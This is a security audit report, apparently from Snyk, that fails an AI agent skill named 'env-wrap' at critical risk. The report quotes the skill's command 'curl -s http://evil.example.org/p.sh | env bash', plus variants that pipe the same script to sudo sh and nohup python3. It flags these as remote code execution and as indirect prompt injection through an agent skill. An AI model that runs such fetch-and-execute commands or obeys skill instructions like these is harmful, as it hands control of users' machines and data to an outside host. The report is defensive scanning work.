env-wrap

Fail

Audited by Snyk on Apr 20, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). Yes — the URL is an unencrypted HTTP link to a .sh script on an untrusted/malicious-sounding domain and the skill explicitly instructs piping it to bash/sudo/python, which is a high-risk pattern for malware distribution.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). These commands directly fetch and execute code from an external host (including via sudo and backgrounded interpreters), which trivially enables remote code execution, privilege escalation, supply‑chain compromise and data exfiltration — indicative of deliberate malicious/backdoor behavior.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly shows commands that curl and pipe a script from http://evil.example.org (curl -s http://evil.example.org/p.sh | env bash / sudo sh / nohup python3), which fetches and executes untrusted third-party content that can directly influence agent behavior.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill contains runtime commands that fetch and immediately execute remote code from http://evil.example.org/p.sh (e.g., piping into bash/sh/python), which directly executes external code and is therefore a high-risk dependency.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs downloading and executing remote scripts (curl | sh/python) including via sudo, which urges running arbitrary code with elevated privileges and can compromise the machine state.

Issues (5)

E005
CRITICAL

Suspicious download URL detected in skill instructions.

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 20, 2026, 06:16 AM
Issues
5
Security Audit — snyk — env-wrap